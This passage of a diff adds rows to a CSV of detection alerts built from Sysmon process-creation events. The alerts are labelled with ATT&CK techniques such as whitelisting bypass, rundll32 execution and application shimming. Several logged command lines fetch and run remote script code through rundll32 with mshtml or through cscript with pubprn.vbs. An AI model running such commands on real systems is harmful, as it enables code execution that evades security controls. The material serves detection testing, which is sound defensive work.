+    <Data Name=""ProcessId"">5844</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;)</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( rundll32  AllTheThings.dll,EntryPoint)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:05.542307Z"">
+    </TimeCreated>
+    <EventRecordID>4968</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:05.526</Data>
+    <Data Name=""ProcessGuid"">747F3D96-664D-5D3F-0000-0010BB5D8C00</Data>
+    <Data Name=""ProcessId"">5572</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32  AllTheThings.dll,EntryPoint</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-664D-5D3F-0000-00108D5B8C00</Data>
+    <Data Name=""ParentProcessId"">912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">rundll32  AllTheThings.dll,EntryPoint</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32  AllTheThings.dll,EntryPoint )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:05.542307Z"">
+    </TimeCreated>
+    <EventRecordID>4968</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:05.526</Data>
+    <Data Name=""ProcessGuid"">747F3D96-664D-5D3F-0000-0010BB5D8C00</Data>
+    <Data Name=""ProcessId"">5572</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32  AllTheThings.dll,EntryPoint</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-664D-5D3F-0000-00108D5B8C00</Data>
+    <Data Name=""ParentProcessId"">912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">rundll32  AllTheThings.dll,EntryPoint</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32  AllTheThings.dll,EntryPoint )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:05.542307Z"">
+    </TimeCreated>
+    <EventRecordID>4968</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:05.526</Data>
+    <Data Name=""ProcessGuid"">747F3D96-664D-5D3F-0000-0010BB5D8C00</Data>
+    <Data Name=""ProcessId"">5572</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32  AllTheThings.dll,EntryPoint</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-664D-5D3F-0000-00108D5B8C00</Data>
+    <Data Name=""ParentProcessId"">912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">rundll32  AllTheThings.dll,EntryPoint</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32  AllTheThings.dll,EntryPoint)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:05.502592Z"">
+    </TimeCreated>
+    <EventRecordID>4967</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:05.475</Data>
+    <Data Name=""ProcessGuid"">747F3D96-664D-5D3F-0000-00108D5B8C00</Data>
+    <Data Name=""ProcessId"">912</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32  AllTheThings.dll,EntryPoint</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-664D-5D3F-0000-0010F1498C00</Data>
+    <Data Name=""ParentProcessId"">6836</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c rundll32 AllTheThings.dll,EntryPoint</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553028767.134377,2019-03-20T00:52:47.134377+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T20:52:47.124363Z"">
+    </TimeCreated>
+    <EventRecordID>1966449</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1564"" ThreadID=""1252"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 20:52:47.054</Data>
+    <Data Name=""ProcessGuid"">365ABB72-569F-5C91-0000-001012610800</Data>
+    <Data Name=""ProcessId"">2548</Data>
+    <Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
+    <Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Compatibility Database Installer</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q &quot;C:\Windows\AppPatch\Test.SDB  &quot;  </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
+    <Data Name=""User"">EXAMPLE\user01</Data>
+    <Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
+    <Data Name=""LogonId"">0x33435</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
+    <Data Name=""ParentProcessId"">2704</Data>
+    <Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32  AllTheThings.dll,EntryPoint )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:05.502592Z"">
+    </TimeCreated>
+    <EventRecordID>4967</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:05.475</Data>
+    <Data Name=""ProcessGuid"">747F3D96-664D-5D3F-0000-00108D5B8C00</Data>
+    <Data Name=""ProcessId"">912</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32  AllTheThings.dll,EntryPoint</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-664D-5D3F-0000-0010F1498C00</Data>
+    <Data Name=""ParentProcessId"">6836</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c rundll32 AllTheThings.dll,EntryPoint</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32  AllTheThings.dll,EntryPoint )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:05.502592Z"">
+    </TimeCreated>
+    <EventRecordID>4967</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:05.475</Data>
+    <Data Name=""ProcessGuid"">747F3D96-664D-5D3F-0000-00108D5B8C00</Data>
+    <Data Name=""ProcessId"">912</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32  AllTheThings.dll,EntryPoint</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-664D-5D3F-0000-0010F1498C00</Data>
+    <Data Name=""ParentProcessId"">6836</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c rundll32 AllTheThings.dll,EntryPoint</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553028746.364512,2019-03-20T00:52:26.364512+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T20:52:26.364512Z"">
+    </TimeCreated>
+    <EventRecordID>1966444</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1564"" ThreadID=""1252"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 20:52:26.194</Data>
+    <Data Name=""ProcessGuid"">365ABB72-568A-5C91-0000-0010D24B0800</Data>
+    <Data Name=""ProcessId"">4072</Data>
+    <Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
+    <Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Compatibility Database Installer</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q -u &quot;C:\Windows\AppPatch\Test.SDB  &quot;  </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
+    <Data Name=""User"">EXAMPLE\user01</Data>
+    <Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
+    <Data Name=""LogonId"">0x33435</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
+    <Data Name=""ParentProcessId"">2704</Data>
+    <Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[ T1059 ] wscript or cscript runing script,1564436085.660037,2019-07-30T01:34:45.660037+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript  /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd  /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:45.606737Z"">
+    </TimeCreated>
+    <EventRecordID>5006</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:45.524</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6675-5D3F-0000-0010875C8F00</Data>
+    <Data Name=""ProcessId"">4036</Data>
+    <Data Name=""Image"">C:\Windows\System32\cscript.exe</Data>
+    <Data Name=""FileVersion"">5.812.10240.16384</Data>
+    <Data Name=""Description"">Microsoft ® Console Based Script Host</Data>
+    <Data Name=""Product"">Microsoft ® Windows Script Host</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cscript  /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6675-5D3F-0000-0010AA498F00</Data>
+    <Data Name=""ParentProcessId"">4184</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547556.069498,2019-07-19T18:45:56.069498+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;del T1121.dll&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:45:56.033241Z"">
+    </TimeCreated>
+    <EventRecordID>3615</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:45:56.002</Data>
